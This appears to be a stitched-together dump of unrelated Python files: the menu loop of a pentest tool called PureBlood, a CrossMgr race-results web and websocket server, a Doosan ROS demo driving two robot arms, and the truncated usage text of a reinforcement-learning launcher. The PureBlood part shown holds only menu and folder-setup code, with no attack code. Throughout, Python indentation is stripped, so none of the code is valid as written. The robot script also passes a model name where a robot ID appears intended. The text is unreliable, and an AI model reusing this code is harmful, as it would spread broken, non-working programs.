print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
def main():
print ("""{3}[ {5}PureBlood Menu {3}]
{2}01{3}) {5}Web Pentest / Information Gathering
{2}02{3}) {5}Web Application Attack
{2}03{3}) {5}Generator
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if choice == 1:
web_pentest()
elif choice == 2:
web_application_attack()
elif choice == 3:
generator()
elif choice == 99:
print ('{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if __name__ == '__main__':
if not os.path.exists('outputs'):
os.mkdir('outputs')
else:
pass
if not os.path.exists('outputs/generator'):
os.mkdir('outputs/generator')
else:
pass
if not os.path.exists('outputs/web_pentest'):
os.mkdir('outputs/web_pentest')
else:
pass
if not os.path.exists('outputs/web_pentest/shodan'):
os.mkdir('outputs/web_pentest/shodan')
else:
pass
if not os.path.exists('outputs/web_application_attack'):
os.mkdir('outputs/web_application_attack')
else:
pass
if not os.path.exists('external'):
os.mkdir('external')
else:
pass
clear()
banner()
main()
|
WebServer.py
|
import os
import io
import re
import six
import sys
import gzip
import glob
import time
import json
import base64
urllib = six.moves.urllib
from six.moves.urllib.parse import quote
from six.moves.urllib.request import url2pathname
import socket
import datetime
import traceback
import threading
from six.moves.queue import Queue, Empty
try:
# Python 2.x
from SocketServer import ThreadingMixIn
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
except ImportError:
# Python 3.x
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler, HTTPServer
from qrcode import QRCode
from tornado.template import Template
from ParseHtmlPayload import ParseHtmlPayload
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
StringIO = six.StringIO
import Utils
import Model
from GetResults import GetResultsRAM, GetResultsBaseline, GetRaceName
from Synchronizer import syncfunc
from ThreadPoolMixIn import ThreadPoolMixIn
class CrossMgrServer(ThreadPoolMixIn, HTTPServer):
pass
now = datetime.datetime.now
reCrossMgrHtml = re.compile( r'^\d\d\d\d-\d\d-\d\d-.*\.html$' )
futureDate = datetime.datetime( now().year+20, 1, 1 )
with open( os.path.join(Utils.getImageFolder(), 'CrossMgr.ico'), 'rb' ) as f:
favicon = f.read()
def readBase64( fname ):
with open( os.path.join(Utils.getImageFolder(), fname), 'rb' ) as f:
return "data:image/png;base64," + base64.b64encode( f.read() ).decode('ascii')
with open( os.path.join(Utils.getImageFolder(), 'CrossMgrHeader.png'), 'rb' ) as f:
DefaultLogoSrc = readBase64('CrossMgrHeader.png')
icons = {
'QRCodeIconSrc': readBase64('QRCodeIcon.png'),
'CountdownIconSrc': readBase64('countdown.png'),
'StartListIconSrc': readBase64('tt_start_list.png'),
'LapCounterIconSrc': readBase64('lapcounter.png'),
'ResultsCurrentIconSrc': readBase64('results_current.png'),
'ResultsPreviousIconSrc': readBase64('results_previous.png'),
'AnnouncerIconSrc': readBase64('announcer.png'),
}
with open(os.path.join(Utils.getHtmlFolder(), 'Index.html')) as f:
indexTemplate = Template( f.read() )
PORT_NUMBER = 8765
def gzipEncode( content ):
if six.PY2:
out = StringIO()
with gzip.GzipFile( fileobj=out, mode='w', compresslevel=5 ) as f:
f.write( content.encode(encoding='utf-8') )
return out.getvalue()
else:
out = io.BytesIO()
with gzip.GzipFile( fileobj=out, mode='wb', compresslevel=5 ) as f:
f.write( content.encode() if not isinstance(content, bytes) else content )
return out.getbuffer()
def validContent( content ):
return content.strip().endswith( '</html>' )
@syncfunc
def getCurrentHtml():
return Model.getCurrentHtml()
@syncfunc
def getCurrentTTCountdownHtml():
return Model.getCurrentTTCountdownHtml()
@syncfunc
def getCurrentTTStartListHtml():
return Model.getCurrentTTStartListHtml()
with open(os.path.join(Utils.getHtmlFolder(), 'LapCounter.html')) as f:
lapCounterTemplate = f.read().encode()
def getLapCounterHtml():
return lapCounterTemplate
with open(os.path.join(Utils.getHtmlFolder(), 'Announcer.html')) as f:
announcerHTML = f.read().encode()
def getAnnouncerHtml():
return announcerHTML
def coreName( fname ):
return os.path.splitext(os.path.basename(fname).split('?')[0])[0].replace('_TTCountdown','').replace('_TTStartList','').strip('-')
class Generic( object ):
def __init__( self, **kwargs ):
self.__dict__.update( kwargs )
class ContentBuffer( object ):
Unchanged = 0
Changed = 1
ReadError = 2
ContentError = 3
def __init__( self ):
self.fileCache = {}
self.fnameRace = None
self.dirRace = None
self.lock = threading.Lock()
def _updateFile( self, fname, forceUpdate=False ):
if not self.fnameRace:
return None
if '_TTCountdown' in fname: # Force update the countdown so we get a valid timestamp.
forceUpdate = True
fnameBase = os.path.basename(fname).split('?')[0]
race = Model.race
if 'CoursePreview.html' in fnameBase or not reCrossMgrHtml.match(fnameBase):
return None
cache = self.fileCache.get( fname, {} )
fnameFull = os.path.join( self.dirRace, fname )
if race and self.fnameRace and coreName(self.fnameRace) == coreName(fnameFull):
if forceUpdate or race.lastChangedTime > cache.get('mtime',0.0):
if '_TTCountdown' in fname:
content = getCurrentTTCountdownHtml()
elif '_TTStartList' in fname:
content = getCurrentTTStartListHtml()
else:
content = getCurrentHtml()
if content:
cache['mtime'] = time.time()
result = ParseHtmlPayload( content=content )
cache['payload'] = result['payload'] if result['success'] else {}
if six.PY2:
cache['content'] = content
cache['gzip_content'] = gzipEncode( content )
else:
cache['content'] = content.encode() if not isinstance(content, bytes) else content
cache['gzip_content'] = gzipEncode( content )
cache['status'] = self.Changed
self.fileCache[fname] = cache
return cache
try:
mtime = os.path.getmtime( fnameFull )
except Exception as e:
self.fileCache.pop( fname, None )
return None
if not forceUpdate and (cache.get('mtime',None) == mtime and cache.get('content',None)):
cache['status'] = self.Unchanged
return cache
cache['status'] = self.Changed
try:
with open(fnameFull) as f:
content = f.read()
except Exception as e:
cache['status'] = self.ReadError
return cache
if not validContent(content):
cache['status'] = self.ContentError
content = ''
cache['mtime'] = mtime
result = ParseHtmlPayload( content=content )
cache['payload'] = result['payload'] if result['success'] else {}
cache['content'] = content.encode('utf-8')
cache['gzip_content'] = gzipEncode( cache['content'] )
self.fileCache[fname] = cache
return cache
def reset( self ):
if self.fnameRace:
self.setFNameRace( self.fnameRace )
def setFNameRace( self, fnameRace ):
with self.lock:
self.fnameRace = fnameRace
self.dirRace = os.path.dirname( fnameRace )
coreNameRace = coreName( os.path.basename(fnameRace) )
self.fileCache = {}
self._updateFile( os.path.splitext(os.path.basename(fnameRace))[0] + '.html' )
for f in glob.glob( os.path.join(self.dirRace, '*.html') ):
self._updateFile( os.path.basename(f), coreName(os.path.basename(f)) == coreNameRace )
def _getFiles( self ):
return [fname for fname, cache in sorted(
six.iteritems(self.fileCache),
key=lambda x: (x[1]['payload'].get('raceScheduledStart',futureDate), x[0])
) if not (fname.endswith('_TTCountdown.html') or fname.endswith('_TTStartList.html'))]
def _getCache( self, fname, checkForUpdate=True ):
if checkForUpdate:
cache = self._updateFile( fname )
else:
try:
cache = self.fileCache[fname]
except KeyError:
cache = self._updateFile( fname, True )
return cache
def getContent( self, fname, checkForUpdate=True ):
with self.lock:
cache = self._getCache( fname, checkForUpdate )
if cache:
return cache.get('content', ''), cache.get('gzip_content', None)
return '', None
def getIndexInfo( self ):
with self.lock:
race = Model.race
if not race:
return {}
result = {
'logoSrc': race.headerImage or DefaultLogoSrc,
'organizer': race.organizer.encode(),
}
files = self._getFiles()
info = []
for fname in files:
cache = self._getCache( fname, False )
if not cache:
continue
payload = cache.get('payload', {})
fnameShow = os.path.splitext(os.path.basename(fname))[0].strip('-')
if fnameShow != 'Simulation':
fnameShow = fnameShow[11:]
g = Generic(
raceScheduledStart = payload.get('raceScheduledStart',None),
name = fnameShow,
categories = [
(
c['name'].encode(),
quote(six.text_type(c['name']).encode()),
c.get( 'starters', 0 ),
c.get( 'finishers', 0 ),
)
for c in payload.get('catDetails',[]) if c['name'] != 'All'],
url = urllib.request.pathname2url(fname),
isTimeTrial = payload.get('isTimeTrial',False),
raceIsRunning = payload.get('raceIsRunning',False),
raceIsFinished = payload.get('raceIsFinished',False),
)
if g.isTimeTrial:
g.urlTTCountdown = urllib.request.pathname2url(os.path.splitext(fname)[0] + '_TTCountdown.html')
g.urlTTStartList = urllib.request.pathname2url(os.path.splitext(fname)[0] + '_TTStartList.html')
else:
g.urlLapCounter = urllib.request.pathname2url('LapCounter.html')
info.append( g )
result['info'] = info
return result
#-----------------------------------------------------------------------
contentBuffer = ContentBuffer()
DEFAULT_HOST = None
def SetFileName( fname ):
if fname.endswith( '.cmn' ):
fname = os.path.splitext(fname)[0] + '.html'
q.put( {'cmd':'fileName', 'fileName':fname} )
def GetPreviousFileName():
file = None
try:
fnameCur = os.path.splitext(Model.race.getFileName())[0] + '.html'
except:
fnameCur = None
files = contentBuffer._getFiles()
try:
file = files[files.index(fnameCur)-1]
except:
pass
if file is None:
try:
file = files[-1]
except:
pass
return file
def getQRCodePage( urlPage ):
qr = QRCode()
qr.add_data( urlPage )
qr.make()
qrcode = '["' + '",\n"'.join(
[''.join( '1' if v else '0' for v in qr.modules[row] ) for row in six.moves.range(qr.modules_count)]
) + '"]'
result = StringIO()
def w( s ):
result.write( s )
result.write( '\n' )
w( '<html>' )
w( '<head>' )
w( '''<style type="text/css">
body {
font-family: sans-serif;
text-align: center;
}
</style>''' )
w( '''<script>
function Draw() {
var qrcode={qrcode};
var c = document.getElementById("idqrcode");
var ctx = c.getContext("2d");
ctx.fillStyle = '#000';
var s = Math.floor( c.width / qrcode.length );
for( var y = 0; y < qrcode.length; ++y ) {
var row = qrcode[y];
for( var x = 0; x < row.length; ++x ) {
if( row.charAt(x) == '1' )
ctx.fillRect( x*s, y*s, s, s );
}
}
}
'''.replace('{qrcode}', qrcode) )
w( '</script>' )
w( '</head>' )
w( '<body onload="Draw();">' )
w( '<h1 style="margin-top: 32px;">Share Race Results</h1>' )
w( '<canvas id="idqrcode" width="360" height="360"></canvas>' )
w( '<h2>Scan the QRCode.<br/>Follow it to the Race Results page.</h2>' )
w( '<h2>{}</h2>'.format(urlPage) )
w( 'Powered by <a href="http://www.sites.google.com/site/crossmgrsoftware">CrossMgr</a>.' )
w( '</body>' )
w( '</html>' )
return result.getvalue().encode()
def getIndexPage( share=True ):
info = contentBuffer.getIndexInfo()
if not info:
return ''
info['share'] = share
info.update( icons )
return indexTemplate.generate( **info )
#---------------------------------------------------------------------------
def WriteHtmlIndexPage():
fname = os.path.join( os.path.dirname(Utils.getFileName()), 'index.html' )
try:
with open(fname, 'rb') as f: # Read as bytes as the index pages is already utf-8 encoded.
previousContent = f.read()
except Exception as e:
previousContent = ''
content = getIndexPage(share=False)
if content != previousContent:
with open(fname, 'wb') as f: # Write as bytes as the index pages is already utf-8 encoded.
f.write( getIndexPage(share=False) )
return fname
class CrossMgrHandler( BaseHTTPRequestHandler ):
html_content = 'text/html; charset=utf-8'
json_content = 'application/json'
reLapCounterHtml = re.compile( r'^\/LapCounter[0-9A-Z-]*\.html$' )
def do_GET(self):
up = urllib.parse.urlparse( self.path )
content, gzip_content = None, None
try:
if up.path=='/':
content = getIndexPage()
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/favicon.ico':
content = favicon
content_type = 'image/x-icon'
assert isinstance( content, bytes )
elif self.reLapCounterHtml.match( up.path ):
content = getLapCounterHtml()
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/Announcer.html':
content = getAnnouncerHtml()
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/qrcode.html':
urlPage = GetCrossMgrHomePage()
content = getQRCodePage( urlPage )
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/servertimestamp.html':
content = Utils.ToJson( {
'servertime':time.time()*1000.0,
'requesttimestamp':float(up.query),
}
).encode()
content_type = self.json_content;
assert isinstance( content, bytes )
else:
file = None
if up.path == '/CurrentResults.html':
try:
file = os.path.splitext(Model.race.getFileName())[0] + '.html'
except:
pass
elif up.path == '/PreviousResults.html':
file = GetPreviousFileName()
if file is None:
file = url2pathname(os.path.basename(up.path))
content, gzip_content = contentBuffer.getContent( file )
content_type = self.html_content
assert isinstance( content, bytes )
except Exception as e:
self.send_error(404,'File Not Found: {} {}\n{}'.format(self.path, e, traceback.format_exc()))
return
self.send_response( 200 )
self.send_header('Content-Type',content_type)
if content_type == self.html_content:
if gzip_content and 'Accept-Encoding' in self.headers and 'gzip' in self.headers['Accept-Encoding']:
content = gzip_content
self.send_header( 'Content-Encoding', 'gzip' )
self.send_header( 'Cache-Control', 'no-cache, no-store, must-revalidate' )
self.send_header( 'Pragma', 'no-cache' )
self.send_header( 'Expires', '0' )
self.send_header( 'Content-Length', len(content) )
self.end_headers()
self.wfile.write( content )
def log_message(self, format, *args):
return
#--------------------------------------------------------------------------
def GetCrossMgrHomePage( ip=None ):
if ip is None:
ip = not sys.platform.lower().startswith('win')
ip = True
if ip:
hostname = DEFAULT_HOST
else:
hostname = socket.gethostname()
try:
socket.gethostbyname( hostname )
except:
hostname = DEFAULT_HOST
return 'http://{}:{}'.format(hostname, PORT_NUMBER)
server = None
def WebServer():
global server
while 1:
try:
server = CrossMgrServer(('', PORT_NUMBER), CrossMgrHandler)
server.init_thread_pool()
server.serve_forever( poll_interval = 2 )
except Exception as e:
server = None
time.sleep( 5 )
def queueListener( q ):
global DEFAULT_HOST, server
DEFAULT_HOST = Utils.GetDefaultHost()
keepGoing = True
while keepGoing:
message = q.get()
cmd = message.get('cmd', None)
if cmd == 'fileName':
DEFAULT_HOST = Utils.GetDefaultHost()
contentBuffer.setFNameRace( message['fileName'] )
elif cmd == 'exit':
keepGoing = False
q.task_done()
if server:
server.shutdown()
server = None
q = Queue()
qThread = threading.Thread( target=queueListener, name='queueListener', args=(q,) )
qThread.daemon = True
qThread.start()
webThread = threading.Thread( target=WebServer, name='WebServer' )
webThread.daemon = True
webThread.start()
from websocket_server import WebsocketServer
#-------------------------------------------------------------------
def message_received(client, server, message):
msg = json.loads( message )
if msg['cmd'] == 'send_baseline' and (msg['raceName'] == 'CurrentResults' or msg['raceName'] == GetRaceName()):
server.send_message( client, json.dumps(GetResultsBaseline()) )
wsServer = None
def WsServerLaunch():
global wsServer
while 1:
try:
wsServer = WebsocketServer( port=PORT_NUMBER + 1, host='' )
wsServer.set_fn_message_received( message_received )
wsServer.run_forever()
except Exception as e:
wsServer = None
time.sleep( 5 )
def WsQueueListener( q ):
global wsServer
keepGoing = True
while keepGoing:
message = q.get()
if message.get('cmd', None) == 'exit':
keepGoing = False
elif wsServer and wsServer.hasClients():
wsServer.send_message_to_all( Utils.ToJson(message).encode() )
q.task_done()
wsServer = None
wsQ = Queue()
wsQThread = threading.Thread( target=WsQueueListener, name='WsQueueListener', args=(wsQ,) )
wsQThread.daemon = True
wsQThread.start()
wsThread = threading.Thread( target=WsServerLaunch, name='WsServer' )
wsThread.daemon = True
wsThread.start()
wsTimer = tTimerStart = None
def WsPost():
global wsServer, wsTimer, tTimerStart
if wsServer and wsServer.hasClients():
while 1:
try:
ram = GetResultsRAM()
break
except AttributeError:
time.sleep( 0.25 )
if ram:
wsQ.put( ram )
if wsTimer:
wsTimer.cancel()
wsTimer = tTimerStart = None
def WsRefresh( updatePrevious=False ):
global wsTimer, tTimerStart
if updatePrevious:
wsQ.put( {'cmd':'reload_previous'} )
return
# If we have a string of competitors, don't send the update
# until there is a gap of a second or more between arrivals.
if not tTimerStart:
tTimerStart = now()
else:
# Check if it has been 5 seconds since the last update.
# If so, let the currently scheduled update fire.
if (now() - tTimerStart).total_seconds() > 5.0:
return
wsTimer.cancel()
# Schedule an update to be sent in the next second.
# This either schedules the first update, or extends a pending update.
wsTimer = threading.Timer( 1.0, WsPost )
wsTimer.start()
#-------------------------------------------------------------------
def GetLapCounterRefresh():
try:
return Utils.mainWin.lapCounter.GetState()
except:
return {
'cmd': 'refresh',
'labels': [],
'foregrounds': [],
'backgrounds': [],
'raceStartTime': None,
'lapElapsedClock': False,
}
def lap_counter_new_client(client, server):
server.send_message( client, json.dumps(GetLapCounterRefresh()) )
wsLapCounterServer = None
def WsLapCounterServerLaunch():
global wsLapCounterServer
while 1:
try:
wsLapCounterServer = WebsocketServer( port=PORT_NUMBER + 2, host='' )
wsLapCounterServer.set_fn_new_client( lap_counter_new_client )
wsLapCounterServer.run_forever()
except Exception as e:
wsLapCounterServer = None
time.sleep( 5 )
def WsLapCounterQueueListener( q ):
global wsLapCounterServer
keepGoing = True
while keepGoing:
message = q.get()
cmd = message.get('cmd', None)
if cmd == 'refresh':
if wsLapCounterServer and wsLapCounterServer.hasClients():
race = Model.race
message['tNow'] = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3]
message['curRaceTime'] = race.curRaceTime() if race and race.startTime else 0.0
wsLapCounterServer.send_message_to_all( Utils.ToJson(message).encode() )
elif cmd == 'exit':
keepGoing = False
q.task_done()
wsLapCounterServer = None
wsLapCounterQ = Queue()
wsLapCounterQThread = threading.Thread( target=WsLapCounterQueueListener, name='WsLapCounterQueueListener', args=(wsLapCounterQ,) )
wsLapCounterQThread.daemon = True
wsLapCounterQThread.start()
wsLapCounterThread = threading.Thread( target=WsLapCounterServerLaunch, name='WsLapCounterServer' )
wsLapCounterThread.daemon = True
wsLapCounterThread.start()
lastRaceName, lastMessage = None, None
def WsLapCounterRefresh():
global lastRaceName, lastMessage
race = Model.race
if not (race and race.isRunning()):
return
if not (wsLapCounterServer and wsLapCounterServer.hasClients()):
return
message, raceName = GetLapCounterRefresh(), GetRaceName()
if lastMessage != message or lastRaceName != raceName:
wsLapCounterQ.put( message )
lastMessage, lastRaceName = message, raceName
if __name__ == '__main__':
SetFileName( os.path.join('Gemma', '2015-11-10-A Men-r4-.html') )
six.print_( 'Started httpserver on port ' , PORT_NUMBER )
try:
time.sleep( 10000 )
except KeyboardInterrupt:
q.put( {'cmd':'exit'} )
|
m1013x2_no_sync.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ##
# @brief [py demo] muliti robot sync test
# @author Kab Kyoum Kim (kabkyoum.kim@doosan.com)
import rospy
import os
import threading, time
import sys
sys.dont_write_bytecode = True
sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__),"../../../../common/imp")) ) # get import path : DSR_ROBOT.py
# for single robot
#import DR_init
#DR_init.__dsr__id = "dsr01"
#DR_init.__dsr__model = "m1013"
#from DSR_ROBOT import *
# for mulit robot
########from DSR_ROBOT_MULTI import *
from DSR_ROBOT import *
def shutdown():
print("shutdown time!")
print("shutdown time!")
print("shutdown time!")
pub_stop_r1.publish(stop_mode=STOP_TYPE_QUICK)
pub_stop_r2.publish(stop_mode=STOP_TYPE_QUICK)
return 0
def msgRobotState_cb_r1(msg):
msgRobotState_cb_r1.count += 1
if (0==(msgRobotState_cb_r1.count % 100)):
rospy.loginfo("________ ROBOT[1] STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
#print(" io_control_box : %d" % (msg.io_control_box))
##print(" io_modbus : %d" % (msg.io_modbus))
##print(" error : %d" % (msg.error))
#print(" access_control : %d" % (msg.access_control))
#print(" homming_completed : %d" % (msg.homming_completed))
#print(" tp_initialized : %d" % (msg.tp_initialized))
print(" speed : %d" % (msg.speed))
#print(" mastering_need : %d" % (msg.mastering_need))
#print(" drl_stopped : %d" % (msg.drl_stopped))
#print(" disconnected : %d" % (msg.disconnected))
msgRobotState_cb_r1.count = 0
def msgRobotState_cb_r2(msg):
msgRobotState_cb_r2.count += 1
if (0==(msgRobotState_cb_r2.count % 100)):
rospy.loginfo("________ ROBOT[2] STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
#print(" io_control_box : %d" % (msg.io_control_box))
##print(" io_modbus : %d" % (msg.io_modbus))
##print(" error : %d" % (msg.error))
#print(" access_control : %d" % (msg.access_control))
#print(" homming_completed : %d" % (msg.homming_completed))
#print(" tp_initialized : %d" % (msg.tp_initialized))
print(" speed : %d" % (msg.speed))
#print(" mastering_need : %d" % (msg.mastering_need))
#print(" drl_stopped : %d" % (msg.drl_stopped))
#print(" disconnected : %d" % (msg.disconnected))
msgRobotState_cb_r2.count = 0
def thread_subscriber_r1(robot_id, robot_model):
rospy.Subscriber('/'+ robot_id + robot_model +'/state', RobotState, msgRobotState_cb_r1)
rospy.spin()
#rospy.spinner(2)
def thread_subscriber_r2(robot_id, robot_model):
rospy.Subscriber('/'+ robot_id + robot_model +'/state', RobotState, msgRobotState_cb_r2)
rospy.spin()
#rospy.spinner(2)
if __name__ == "__main__":
rospy.init_node('m1013x2_amove_py')
rospy.on_shutdown(shutdown)
robot_id1 = "dsr01"; robot_model1 = "m1013"
robot_id2 = "dsr02"; robot_model2 = "m1013"
r1 = CDsrRobot(robot_id1,robot_model1)
r2 = CDsrRobot(robot_model2,robot_model2)
pub_stop_r1 = rospy.Publisher('/'+ robot_id1 + robot_model1 +'/stop', RobotStop, queue_size=10)
pub_stop_r2 = rospy.Publisher('/'+ robot_id2 + robot_model2 +'/stop', RobotStop, queue_size=10)
#t1 = threading.Thread(target=thread_subscriber_r1, args=(robot_id1, robot_model1))
#t1.daemon = True
#t1.start()
#t2 = threading.Thread(target=thread_subscriber_r2, args=(robot_id2, robot_model2))
#t2.daemon = True
#t2.start()
#----------------------------------------------------------------------
JReady = posj(0, -20, 110, 0, 60, 0)
J00 = posj(-180, 0, -145, 0, -35, 0)
J01r = posj(-180.0, 71.4, -145.0, 0.0, -9.7, 0.0)
J02r = posj(-180.0, 67.7, -144.0, 0.0, 76.3, 0.0)
J03r = posj(-180.0, 0.0, 0.0, 0.0, 0.0, 0.0)
J04r = posj(-90.0, 0.0, 0.0, 0.0, 0.0, 0.0)
J04r1 = posj(-90.0, 30.0, -60.0, 0.0, 30.0, -0.0)
J04r2 = posj(-90.0, -45.0, 90.0, 0.0, -45.0, -0.0)
J04r3 = posj(-90.0, 60.0, -120.0, 0.0, 60.0, -0.0)
J04r4 = posj(-90.0, 0.0, -0.0, 0.0, 0.0, -0.0)
J05r = posj(-144.0, -4.0, -84.8, -90.9, 54.0, -1.1)
J07r = posj(-152.4, 12.4, -78.6, 18.7, -68.3, -37.7)
J08r = posj(-90.0, 30.0, -120.0, -90.0, -90.0, 0.0)
JEnd = posj(0.0, -12.6, 101.1, 0.0, 91.5, -0.0)
dREL1 = posx(0, 0, 350, 0, 0, 0)
dREL2 = posx(0, 0, -350, 0, 0, 0)
velx = [0, 0]
accx = [0, 0]
vel_spi = [400, 400]
acc_spi = [150, 150]
J1 = posj(81.2, 20.8, 127.8, 162.5, 56.1, -37.1)
X0 = posx(-88.7, 799.0, 182.3, 95.7, 93.7, 133.9)
X1 = posx(304.2, 871.8, 141.5, 99.5, 84.9, 133.4)
X2 = posx(437.1, 876.9, 362.1, 99.6, 84.0, 132.1)
X3 = posx(-57.9, 782.4, 478.4, 99.6, 84.0, 132.1)
amp = [0, 0, 0, 30, 30, 0]
period = [0, 0, 0, 3, 6, 0]
x01 = [423.6, 334.5, 651.2, 84.7, -180.0, 84.7]
x02 = [423.6, 34.5, 951.2, 68.2, -180.0, 68.2]
x03 = [423.6, -265.5, 651.2, 76.1, -180.0, 76.1]
x04 = [423.6, 34.5, 351.2, 81.3, -180.0, 81.3]
while not rospy.is_shutdown():
r1.amovej(JReady, 20, 20)
r2.amovej(JReady, 20, 20)
r1.mwait(); r2.mwait()
r1.amovej(J1, time = 3)
r2.amovej(J1, time = 3)
r1.mwait(); r2.mwait()
r1.amovel(X3, time = 2.5)
r2.amovel(X3, time = 2.5)
r1.mwait(); r2.mwait()
for i in range(1, 3):
r1.amovel(X2, time = 2.5, r = 50)
r2.amovel(X2, time = 2.5, r = 50)
r1.mwait(); r2.mwait()
r1.amovel(X1, time = 1.5, r = 50)
r2.amovel(X1, time = 1.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(X0, time = 2.5)
r2.amovel(X0, time = 2.5)
r1.move_wait(); r2.move_wait()
r1.amovel(X1, time = 2.5, r = 50)
r2.amovel(X1, time = 2.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(X2, time = 1.5, r = 50)
r2.amovel(X2, time = 1.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(X3, time = 2.5, r = 50)
r2.amovel(X3, time = 2.5, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J00, time = 6)
r2.amovej(J00, time = 6)
r1.move_wait(); r2.move_wait()
r1.amovej(J01r, time = 2, r = 100)
r2.amovej(J01r, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovej(J02r, time = 2, r = 50)
r2.amovej(J02r, time = 2, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J03r, time = 2)
r2.amovej(J03r, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r, time = 1.5)
r2.amovej(J04r, time = 1.5)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r1, time = 2, r = 50)
r2.amovej(J04r1, time = 2, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r2, time = 4, r = 50)
r2.amovej(J04r2, time = 4, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r3, time = 4, r = 50)
r2.amovej(J04r3, time = 4, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovej(J04r4, time = 2)
r2.amovej(J04r4, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovej(J05r, time = 2.5, r = 100)
r2.amovej(J05r, time = 2.5, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(dREL1, time = 1, ref = DR_TOOL, r = 50)
r2.amovel(dREL1, time = 1, ref = DR_TOOL, r = 50)
r1.move_wait(); r2.move_wait()
r1.amovel(dREL2, time = 1.5, ref = DR_TOOL, r = 100)
r2.amovel(dREL2, time = 1.5, ref = DR_TOOL, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovej(J07r, time = 1.5, r = 100)
r2.amovej(J07r, time = 1.5, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovej(J08r, time = 2)
r2.amovej(J08r, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovej(JEnd, time = 4)
r2.amovej(JEnd, time = 4)
r1.move_wait(); r2.move_wait()
r1.amove_periodic([0,0,0,30,30,0],[0,0,0,3,6,0], atime=0,repeat=1, ref=DR_TOOL)
r2.amove_periodic([0,0,0,30,30,0],[0,0,0,3,6,0], atime=0,repeat=1, ref=DR_TOOL)
r1.move_wait(); r2.move_wait()
r1.amove_spiral (rev=3, rmax=200, lmax=100, vel=400, acc=150, axis=DR_AXIS_X, ref=DR_TOOL)
r2.amove_spiral (rev=3, rmax=200, lmax=100, vel=400, acc=150, axis=DR_AXIS_X, ref=DR_TOOL)
r1.move_wait(); r2.move_wait()
r1.amovel(x01, time = 2)
r2.amovel(x01, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovel(x04, time = 2, r = 100)
r2.amovel(x04, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(x03, time = 2, r = 100)
r2.amovel(x03, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(x02, time = 2, r = 100)
r2.amovel(x02, time = 2, r = 100)
r1.move_wait(); r2.move_wait()
r1.amovel(x01, time = 2)
r2.amovel(x01, time = 2)
r1.move_wait(); r2.move_wait()
r1.amovec(x02, x04, time = 4, angle = 360)
r2.amovec(x02, x04, time = 4, angle = 360)
r1.move_wait(); r2.move_wait()
#----------------------------------------------------------------------
print('good bye!')
|
run.py
|
#!/usr/bin/env python3
# encoding: utf-8
"""
Usage:
python [options]
Options:
-h,--help 显示帮助
-a,--algorithm=<name> 算法
specify the training algorithm [default: ppo]
-c,--copys=<n> 指定并行训练的数量
nums of environment copys that collect data in parallel [default: 1]
-e,--env=<file> 指定Unity环境路径
specify the path of builded training environment of UNITY3D [default: None]
-g,--graphic 是否显示图形界面
whether show graphic interface when using UNITY3D [default: False]
-i,--inference 推断
inference the trained model, not train policies [default: False]
-m,--models=<n> 同时训练多少个模型
specify the number of trails that using different random seeds [default: 1]
-n,--name=<name> 训练的名字
specify the name of this training task [default: None]
-p,--port=<n> 端口
